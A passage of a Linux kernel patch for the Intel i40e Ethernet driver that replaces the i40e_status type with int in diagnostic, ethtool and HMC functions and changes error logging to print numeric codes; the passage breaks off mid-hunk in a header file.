+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.c b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+index ca229b0efeb65..97fe1787a8f4a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.c
+@@ -10,8 +10,8 @@
+  * @reg: reg to be tested
+  * @mask: bits to be touched
+  **/
+-static i40e_status i40e_diag_reg_pattern_test(struct i40e_hw *hw,
+-							u32 reg, u32 mask)
++static int i40e_diag_reg_pattern_test(struct i40e_hw *hw,
++				      u32 reg, u32 mask)
+ {
+ 	static const u32 patterns[] = {
+ 		0x5A5A5A5A, 0xA5A5A5A5, 0x00000000, 0xFFFFFFFF
+@@ -74,9 +74,9 @@ const struct i40e_diag_reg_test_info i40e_reg_list[] = {
+  *
+  * Perform registers diagnostic test
+  **/
+-i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
++int i40e_diag_reg_test(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u32 reg, mask;
+ 	u32 elements;
+ 	u32 i, j;
+@@ -115,9 +115,9 @@ i40e_status i40e_diag_reg_test(struct i40e_hw *hw)
+  *
+  * Perform EEPROM diagnostic test
+  **/
+-i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw)
++int i40e_diag_eeprom_test(struct i40e_hw *hw)
+ {
+-	i40e_status ret_code;
++	int ret_code;
+ 	u16 reg_val;
+ 
+ 	/* read NVM control word and if NVM valid, validate EEPROM checksum*/
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_diag.h b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+index 1db7c6d572311..c3ce5f35211f0 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_diag.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_diag.h
+@@ -22,7 +22,7 @@ struct i40e_diag_reg_test_info {
+ 
+ extern const struct i40e_diag_reg_test_info i40e_reg_list[];
+ 
+-i40e_status i40e_diag_reg_test(struct i40e_hw *hw);
+-i40e_status i40e_diag_eeprom_test(struct i40e_hw *hw);
++int i40e_diag_reg_test(struct i40e_hw *hw);
++int i40e_diag_eeprom_test(struct i40e_hw *hw);
+ 
+ #endif /* _I40E_DIAG_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+index f6fa63e4253c5..e632041aed5f8 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_ethtool.c
+@@ -1226,8 +1226,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool autoneg_changed = false;
+-	i40e_status status = 0;
+ 	int timeout = 50;
++	int status = 0;
+ 	int err = 0;
+ 	__u32 speed;
+ 	u8 autoneg;
+@@ -1453,8 +1453,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %s aq_err %s\n",
+-				    i40e_stat_str(hw, status),
++				    "Set phy config failed, err %d aq_err %s\n",
++				    status,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1463,8 +1463,8 @@ static int i40e_set_link_ksettings(struct net_device *netdev,
+ 		status = i40e_update_link_info(hw);
+ 		if (status)
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %s aq_err %s\n",
+-				   i40e_stat_str(hw, status),
++				   "Updating link info failed with err %d aq_err %s\n",
++				   status,
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 
+ 	} else {
+@@ -1483,7 +1483,7 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status status = 0;
++	int status = 0;
+ 	u32 flags = 0;
+ 	int err = 0;
+ 
+@@ -1515,8 +1515,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 		status = i40e_aq_set_phy_config(hw, &config, NULL);
+ 		if (status) {
+ 			netdev_info(netdev,
+-				    "Set phy config failed, err %s aq_err %s\n",
+-				    i40e_stat_str(hw, status),
++				    "Set phy config failed, err %d aq_err %s\n",
++				    status,
+ 				    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 			err = -EAGAIN;
+ 			goto done;
+@@ -1529,8 +1529,8 @@ static int i40e_set_fec_cfg(struct net_device *netdev, u8 fec_cfg)
+ 			 * (e.g. no physical connection etc.)
+ 			 */
+ 			netdev_dbg(netdev,
+-				   "Updating link info failed with err %s aq_err %s\n",
+-				   i40e_stat_str(hw, status),
++				   "Updating link info failed with err %d aq_err %s\n",
++				   status,
+ 				   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 	}
+ 
+@@ -1545,7 +1545,7 @@ static int i40e_get_fec_param(struct net_device *netdev,
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+-	i40e_status status = 0;
++	int status = 0;
+ 	int err = 0;
+ 	u8 fec_cfg;
+ 
+@@ -1632,12 +1632,12 @@ static int i40e_nway_reset(struct net_device *netdev)
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool link_up = hw->phy.link_info.link_info & I40E_AQ_LINK_UP;
+-	i40e_status ret = 0;
++	int ret = 0;
+ 
+ 	ret = i40e_aq_set_link_restart_an(hw, link_up, NULL);
+ 	if (ret) {
+-		netdev_info(netdev, "link restart failed, err %s aq_err %s\n",
+-			    i40e_stat_str(hw, ret),
++		netdev_info(netdev, "link restart failed, err %d aq_err %s\n",
++			    ret,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		return -EIO;
+ 	}
+@@ -1697,9 +1697,9 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	struct i40e_link_status *hw_link_info = &hw->phy.link_info;
+ 	struct i40e_dcbx_config *dcbx_cfg = &hw->local_dcbx_config;
+ 	bool link_up = hw_link_info->link_info & I40E_AQ_LINK_UP;
+-	i40e_status status;
+ 	u8 aq_failures;
+ 	int err = 0;
++	int status;
+ 	u32 is_an;
+ 
+ 	/* Changing the port's flow control is not supported if this isn't the
+@@ -1753,20 +1753,20 @@ static int i40e_set_pauseparam(struct net_device *netdev,
+ 	status = i40e_set_fc(hw, &aq_failures, link_up);
+ 
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_GET) {
+-		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the get_phy_capabilities call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_SET) {
+-		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the set_phy_config call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+ 	if (aq_failures & I40E_SET_FC_AQ_FAIL_UPDATE) {
+-		netdev_info(netdev, "Set fc failed on the get_link_info call with err %s aq_err %s\n",
+-			    i40e_stat_str(hw, status),
++		netdev_info(netdev, "Set fc failed on the get_link_info call with err %d aq_err %s\n",
++			    status,
+ 			    i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		err = -EAGAIN;
+ 	}
+@@ -2581,8 +2581,8 @@ static u64 i40e_link_test(struct net_device *netdev, u64 *data)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_pf *pf = np->vsi->back;
+-	i40e_status status;
+ 	bool link_up = false;
++	int status;
+ 
+ 	netif_info(pf, hw, netdev, "link test\n");
+ 	status = i40e_get_link_status(&pf->hw, &link_up);
+@@ -2805,11 +2805,11 @@ static int i40e_set_phys_id(struct net_device *netdev,
+ 			    enum ethtool_phys_id_state state)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+-	i40e_status ret = 0;
+ 	struct i40e_pf *pf = np->vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	int blink_freq = 2;
+ 	u16 temp_status;
++	int ret = 0;
+ 
+ 	switch (state) {
+ 	case ETHTOOL_ID_ACTIVE:
+@@ -5245,7 +5245,7 @@ static int i40e_set_priv_flags(struct net_device *dev, u32 flags)
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	u32 reset_needed = 0;
+-	i40e_status status;
++	int status;
+ 	u32 i, j;
+ 
+ 	orig_flags = READ_ONCE(pf->flags);
+@@ -5360,8 +5360,8 @@ flags_complete:
+ 						0, NULL);
+ 		if (ret && pf->hw.aq.asq_last_status != I40E_AQ_RC_ESRCH) {
+ 			dev_info(&pf->pdev->dev,
+-				 "couldn't set switch config bits, err %s aq_err %s\n",
+-				 i40e_stat_str(&pf->hw, ret),
++				 "couldn't set switch config bits, err %d aq_err %s\n",
++				 ret,
+ 				 i40e_aq_str(&pf->hw,
+ 					     pf->hw.aq.asq_last_status));
+ 			/* not a fatal problem, just keep going */
+@@ -5433,9 +5433,8 @@ flags_complete:
+ 					return -EBUSY;
+ 				default:
+ 					dev_warn(&pf->pdev->dev,
+-						 "Starting FW LLDP agent failed: error: %s, %s\n",
+-						 i40e_stat_str(&pf->hw,
+-							       status),
++						 "Starting FW LLDP agent failed: error: %d, %s\n",
++						 status,
+ 						 i40e_aq_str(&pf->hw,
+ 							     adq_err));
+ 					return -EINVAL;
+@@ -5475,8 +5474,8 @@ static int i40e_get_module_info(struct net_device *netdev,
+ 	u32 sff8472_comp = 0;
+ 	u32 sff8472_swap = 0;
+ 	u32 sff8636_rev = 0;
+-	i40e_status status;
+ 	u32 type = 0;
++	int status;
+ 
+ 	/* Check if firmware supports reading module EEPROM. */
+ 	if (!(hw->flags & I40E_HW_FLAG_AQ_PHY_ACCESS_CAPABLE)) {
+@@ -5580,8 +5579,8 @@ static int i40e_get_module_eeprom(struct net_device *netdev,
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
+ 	bool is_sfp = false;
+-	i40e_status status;
+ 	u32 value = 0;
++	int status;
+ 	int i;
+ 
+ 	if (!ee || !ee->len || !data)
+@@ -5622,10 +5621,10 @@ static int i40e_get_eee(struct net_device *netdev, struct ethtool_eee *edata)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_aq_get_phy_abilities_resp phy_cfg;
+-	enum i40e_status_code status = 0;
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
++	int status = 0;
+ 
+ 	/* Get initial PHY capabilities */
+ 	status = i40e_aq_get_phy_capabilities(hw, false, true, &phy_cfg, NULL);
+@@ -5687,11 +5686,11 @@ static int i40e_set_eee(struct net_device *netdev, struct ethtool_eee *edata)
+ {
+ 	struct i40e_netdev_priv *np = netdev_priv(netdev);
+ 	struct i40e_aq_get_phy_abilities_resp abilities;
+-	enum i40e_status_code status = I40E_SUCCESS;
+ 	struct i40e_aq_set_phy_config config;
+ 	struct i40e_vsi *vsi = np->vsi;
+ 	struct i40e_pf *pf = vsi->back;
+ 	struct i40e_hw *hw = &pf->hw;
++	int status = I40E_SUCCESS;
+ 	__le16 eee_capability;
+ 
+ 	/* Deny parameters we don't support */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_hmc.c b/drivers/net/ethernet/intel/i40e/i40e_hmc.c
+index 163ee8c6311cc..46f7950a0049a 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_hmc.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_hmc.c
+@@ -17,17 +17,17 @@
+  * @type: what type of segment descriptor we're manipulating
+  * @direct_mode_sz: size to alloc in direct mode
+  **/
+-i40e_status i40e_add_sd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 sd_index,
+-					      enum i40e_sd_entry_type type,
+-					      u64 direct_mode_sz)
++int i40e_add_sd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 sd_index,
++			    enum i40e_sd_entry_type type,
++			    u64 direct_mode_sz)
+ {
+ 	enum i40e_memory_type mem_type __attribute__((unused));
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	bool dma_mem_alloc_done = false;
++	int ret_code = I40E_SUCCESS;
+ 	struct i40e_dma_mem mem;
+-	i40e_status ret_code = I40E_SUCCESS;
+ 	u64 alloc_len;
+ 
+ 	if (NULL == hmc_info->sd_table.sd_entry) {
+@@ -106,19 +106,19 @@ exit:
+  *	   aligned on 4K boundary and zeroed memory.
+  *	2. It should be 4K in size.
+  **/
+-i40e_status i40e_add_pd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 pd_index,
+-					      struct i40e_dma_mem *rsrc_pg)
++int i40e_add_pd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 pd_index,
++			    struct i40e_dma_mem *rsrc_pg)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	struct i40e_dma_mem mem;
+ 	struct i40e_dma_mem *page = &mem;
+ 	u32 sd_idx, rel_pd_idx;
+-	u64 *pd_addr;
++	int ret_code = 0;
+ 	u64 page_desc;
++	u64 *pd_addr;
+ 
+ 	if (pd_index / I40E_HMC_PD_CNT_IN_SD >= hmc_info->sd_table.sd_cnt) {
+ 		ret_code = I40E_ERR_INVALID_PAGE_DESC_INDEX;
+@@ -185,15 +185,15 @@ exit:
+  *	1. Caller can deallocate the memory used by backing storage after this
+  *	   function returns.
+  **/
+-i40e_status i40e_remove_pd_bp(struct i40e_hw *hw,
+-					struct i40e_hmc_info *hmc_info,
+-					u32 idx)
++int i40e_remove_pd_bp(struct i40e_hw *hw,
++		      struct i40e_hmc_info *hmc_info,
++		      u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	u32 sd_idx, rel_pd_idx;
++	int ret_code = 0;
+ 	u64 *pd_addr;
+ 
+ 	/* calculate index */
+@@ -241,11 +241,11 @@ exit:
+  * @hmc_info: pointer to the HMC configuration information structure
+  * @idx: the page index
+  **/
+-i40e_status i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
+-					     u32 idx)
++int i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
++			   u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
++	int ret_code = 0;
+ 
+ 	/* get the entry and decrease its ref counter */
+ 	sd_entry = &hmc_info->sd_table.sd_entry[idx];
+@@ -269,9 +269,9 @@ exit:
+  * @idx: the page index
+  * @is_pf: used to distinguish between VF and PF
+  **/
+-i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+-					    struct i40e_hmc_info *hmc_info,
+-					    u32 idx, bool is_pf)
++int i40e_remove_sd_bp_new(struct i40e_hw *hw,
++			  struct i40e_hmc_info *hmc_info,
++			  u32 idx, bool is_pf)
+ {
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 
+@@ -290,11 +290,11 @@ i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+  * @hmc_info: pointer to the HMC configuration information structure
+  * @idx: segment descriptor index to find the relevant page descriptor
+  **/
+-i40e_status i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
+-					       u32 idx)
++int i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
++			     u32 idx)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
++	int ret_code = 0;
+ 
+ 	sd_entry = &hmc_info->sd_table.sd_entry[idx];
+ 
+@@ -318,9 +318,9 @@ exit:
+  * @idx: segment descriptor index to find the relevant page descriptor
+  * @is_pf: used to distinguish between VF and PF
+  **/
+-i40e_status i40e_remove_pd_page_new(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 idx, bool is_pf)
++int i40e_remove_pd_page_new(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 idx, bool is_pf)
+ {
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_hmc.h b/drivers/net/ethernet/intel/i40e/i40e_hmc.h
+index 3113792afaffa..9960da07a5732 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_hmc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_hmc.h
+@@ -187,28 +187,28 @@ struct i40e_hmc_info {
+ 	/* add one more to the limit to correct our range */		\
+ 	*(pd_limit) += 1;						\
+ }
+-i40e_status i40e_add_sd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 sd_index,
+-					      enum i40e_sd_entry_type type,
+-					      u64 direct_mode_sz);
+-
+-i40e_status i40e_add_pd_table_entry(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 pd_index,
+-					      struct i40e_dma_mem *rsrc_pg);
+-i40e_status i40e_remove_pd_bp(struct i40e_hw *hw,
+-					struct i40e_hmc_info *hmc_info,
+-					u32 idx);
+-i40e_status i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
+-					     u32 idx);
+-i40e_status i40e_remove_sd_bp_new(struct i40e_hw *hw,
+-					    struct i40e_hmc_info *hmc_info,
+-					    u32 idx, bool is_pf);
+-i40e_status i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
+-					       u32 idx);
+-i40e_status i40e_remove_pd_page_new(struct i40e_hw *hw,
+-					      struct i40e_hmc_info *hmc_info,
+-					      u32 idx, bool is_pf);
++
++int i40e_add_sd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 sd_index,
++			    enum i40e_sd_entry_type type,
++			    u64 direct_mode_sz);
++int i40e_add_pd_table_entry(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 pd_index,
++			    struct i40e_dma_mem *rsrc_pg);
++int i40e_remove_pd_bp(struct i40e_hw *hw,
++		      struct i40e_hmc_info *hmc_info,
++		      u32 idx);
++int i40e_prep_remove_sd_bp(struct i40e_hmc_info *hmc_info,
++			   u32 idx);
++int i40e_remove_sd_bp_new(struct i40e_hw *hw,
++			  struct i40e_hmc_info *hmc_info,
++			  u32 idx, bool is_pf);
++int i40e_prep_remove_pd_page(struct i40e_hmc_info *hmc_info,
++			     u32 idx);
++int i40e_remove_pd_page_new(struct i40e_hw *hw,
++			    struct i40e_hmc_info *hmc_info,
++			    u32 idx, bool is_pf);
+ 
+ #endif /* _I40E_HMC_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
+index d6e92ecddfbd8..40c101f286d19 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.c
+@@ -74,12 +74,12 @@ static u64 i40e_calculate_l2fpm_size(u32 txq_num, u32 rxq_num,
+  * Assumptions:
+  *   - HMC Resource Profile has been selected before calling this function.
+  **/
+-i40e_status i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
+-					u32 rxq_num, u32 fcoe_cntx_num,
+-					u32 fcoe_filt_num)
++int i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
++		      u32 rxq_num, u32 fcoe_cntx_num,
++		      u32 fcoe_filt_num)
+ {
+ 	struct i40e_hmc_obj_info *obj, *full_obj;
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 	u64 l2fpm_size;
+ 	u32 size_exp;
+ 
+@@ -229,11 +229,11 @@ init_lan_hmc_out:
+  *	1. caller can deallocate the memory used by pd after this function
+  *	   returns.
+  **/
+-static i40e_status i40e_remove_pd_page(struct i40e_hw *hw,
+-						 struct i40e_hmc_info *hmc_info,
+-						 u32 idx)
++static int i40e_remove_pd_page(struct i40e_hw *hw,
++			       struct i40e_hmc_info *hmc_info,
++			       u32 idx)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (!i40e_prep_remove_pd_page(hmc_info, idx))
+ 		ret_code = i40e_remove_pd_page_new(hw, hmc_info, idx, true);
+@@ -256,11 +256,11 @@ static i40e_status i40e_remove_pd_page(struct i40e_hw *hw,
+  *	1. caller can deallocate the memory used by backing storage after this
+  *	   function returns.
+  **/
+-static i40e_status i40e_remove_sd_bp(struct i40e_hw *hw,
+-					       struct i40e_hmc_info *hmc_info,
+-					       u32 idx)
++static int i40e_remove_sd_bp(struct i40e_hw *hw,
++			     struct i40e_hmc_info *hmc_info,
++			     u32 idx)
+ {
+-	i40e_status ret_code = 0;
++	int ret_code = 0;
+ 
+ 	if (!i40e_prep_remove_sd_bp(hmc_info, idx))
+ 		ret_code = i40e_remove_sd_bp_new(hw, hmc_info, idx, true);
+@@ -276,15 +276,15 @@ static i40e_status i40e_remove_sd_bp(struct i40e_hw *hw,
+  * This will allocate memory for PDs and backing pages and populate
+  * the sd and pd entries.
+  **/
+-static i40e_status i40e_create_lan_hmc_object(struct i40e_hw *hw,
+-				struct i40e_hmc_lan_create_obj_info *info)
++static int i40e_create_lan_hmc_object(struct i40e_hw *hw,
++				      struct i40e_hmc_lan_create_obj_info *info)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	u32 pd_idx1 = 0, pd_lmt1 = 0;
+ 	u32 pd_idx = 0, pd_lmt = 0;
+ 	bool pd_error = false;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 	u64 sd_size;
+ 	u32 i, j;
+ 
+@@ -435,13 +435,13 @@ exit:
+  * - This function will be called after i40e_init_lan_hmc() and before
+  *   any LAN/FCoE HMC objects can be created.
+  **/
+-i40e_status i40e_configure_lan_hmc(struct i40e_hw *hw,
+-					     enum i40e_hmc_model model)
++int i40e_configure_lan_hmc(struct i40e_hw *hw,
++			   enum i40e_hmc_model model)
+ {
+ 	struct i40e_hmc_lan_create_obj_info info;
+-	i40e_status ret_code = 0;
+ 	u8 hmc_fn_id = hw->hmc.hmc_fn_id;
+ 	struct i40e_hmc_obj_info *obj;
++	int ret_code = 0;
+ 
+ 	/* Initialize part of the create object info struct */
+ 	info.hmc_info = &hw->hmc;
+@@ -520,13 +520,13 @@ configure_lan_hmc_out:
+  * caller should deallocate memory allocated previously for
+  * book-keeping information about PDs and backing storage.
+  **/
+-static i40e_status i40e_delete_lan_hmc_object(struct i40e_hw *hw,
+-				struct i40e_hmc_lan_delete_obj_info *info)
++static int i40e_delete_lan_hmc_object(struct i40e_hw *hw,
++				      struct i40e_hmc_lan_delete_obj_info *info)
+ {
+-	i40e_status ret_code = 0;
+ 	struct i40e_hmc_pd_table *pd_table;
+ 	u32 pd_idx, pd_lmt, rel_pd_idx;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 	u32 i, j;
+ 
+ 	if (NULL == info) {
+@@ -632,10 +632,10 @@ exit:
+  * This must be called by drivers as they are shutting down and being
+  * removed from the OS.
+  **/
+-i40e_status i40e_shutdown_lan_hmc(struct i40e_hw *hw)
++int i40e_shutdown_lan_hmc(struct i40e_hw *hw)
+ {
+ 	struct i40e_hmc_lan_delete_obj_info info;
+-	i40e_status ret_code;
++	int ret_code;
+ 
+ 	info.hmc_info = &hw->hmc;
+ 	info.rsrc_type = I40E_HMC_LAN_FULL;
+@@ -915,9 +915,9 @@ static void i40e_write_qword(u8 *hmc_bits,
+  * @context_bytes: pointer to the context bit array (DMA memory)
+  * @hmc_type: the type of HMC resource
+  **/
+-static i40e_status i40e_clear_hmc_context(struct i40e_hw *hw,
+-					u8 *context_bytes,
+-					enum i40e_hmc_lan_rsrc_type hmc_type)
++static int i40e_clear_hmc_context(struct i40e_hw *hw,
++				  u8 *context_bytes,
++				  enum i40e_hmc_lan_rsrc_type hmc_type)
+ {
+ 	/* clean the bit array */
+ 	memset(context_bytes, 0, (u32)hw->hmc.hmc_obj[hmc_type].size);
+@@ -931,9 +931,9 @@ static i40e_status i40e_clear_hmc_context(struct i40e_hw *hw,
+  * @ce_info:  a description of the struct to be filled
+  * @dest:     the struct to be filled
+  **/
+-static i40e_status i40e_set_hmc_context(u8 *context_bytes,
+-					struct i40e_context_ele *ce_info,
+-					u8 *dest)
++static int i40e_set_hmc_context(u8 *context_bytes,
++				struct i40e_context_ele *ce_info,
++				u8 *dest)
+ {
+ 	int f;
+ 
+@@ -973,18 +973,18 @@ static i40e_status i40e_set_hmc_context(u8 *context_bytes,
+  * base pointer.  This function is used for LAN Queue contexts.
+  **/
+ static
+-i40e_status i40e_hmc_get_object_va(struct i40e_hw *hw, u8 **object_base,
+-				   enum i40e_hmc_lan_rsrc_type rsrc_type,
+-				   u32 obj_idx)
++int i40e_hmc_get_object_va(struct i40e_hw *hw, u8 **object_base,
++			   enum i40e_hmc_lan_rsrc_type rsrc_type,
++			   u32 obj_idx)
+ {
+ 	struct i40e_hmc_info *hmc_info = &hw->hmc;
+ 	u32 obj_offset_in_sd, obj_offset_in_pd;
+ 	struct i40e_hmc_sd_entry *sd_entry;
+ 	struct i40e_hmc_pd_entry *pd_entry;
+ 	u32 pd_idx, pd_lmt, rel_pd_idx;
+-	i40e_status ret_code = 0;
+ 	u64 obj_offset_in_fpm;
+ 	u32 sd_idx, sd_lmt;
++	int ret_code = 0;
+ 
+ 	if (NULL == hmc_info) {
+ 		ret_code = I40E_ERR_BAD_PTR;
+@@ -1042,11 +1042,11 @@ exit:
+  * @hw:    the hardware struct
+  * @queue: the queue we care about
+  **/
+-i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+-						      u16 queue)
++int i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
++				    u16 queue)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_TX, queue);
+@@ -1062,12 +1062,12 @@ i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+  * @queue: the queue we care about
+  * @s:     the struct to be filled
+  **/
+-i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_txq *s)
++int i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_txq *s)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_TX, queue);
+@@ -1083,11 +1083,11 @@ i40e_status i40e_set_lan_tx_queue_context(struct i40e_hw *hw,
+  * @hw:    the hardware struct
+  * @queue: the queue we care about
+  **/
+-i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+-						      u16 queue)
++int i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
++				    u16 queue)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_RX, queue);
+@@ -1103,12 +1103,12 @@ i40e_status i40e_clear_lan_rx_queue_context(struct i40e_hw *hw,
+  * @queue: the queue we care about
+  * @s:     the struct to be filled
+  **/
+-i40e_status i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
+-						    u16 queue,
+-						    struct i40e_hmc_obj_rxq *s)
++int i40e_set_lan_rx_queue_context(struct i40e_hw *hw,
++				  u16 queue,
++				  struct i40e_hmc_obj_rxq *s)
+ {
+-	i40e_status err;
+ 	u8 *context_bytes;
++	int err;
+ 
+ 	err = i40e_hmc_get_object_va(hw, &context_bytes,
+ 				     I40E_HMC_LAN_RX, queue);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
+index c46a2c449e60e..9f960404c2b37 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_lan_hmc.h
+@@ -137,22 +137,22 @@ struct i40e_hmc_lan_delete_obj_info {
+ 	u32 count;
+ };
+ 
+-i40e_status i40e_init_lan_hmc(struct i40e_hw *hw, u32 txq_num,
+-					u32 rxq_num, u32 fcoe_cntx_num,
+-					u32 fcoe_filt_num);
+-i40e_status i40e_configure_lan_hmc(struct i40e_hw *hw,
+-					     enum i40e_hmc_model model);
+-i40e_status i40e_shutdown_lan_hmc(struct i40e_hw *hw);
+-
+-i40e_status i40e_clear_lan_tx_queue_context(struct i40e_hw *hw,
+-						      u16 queue);
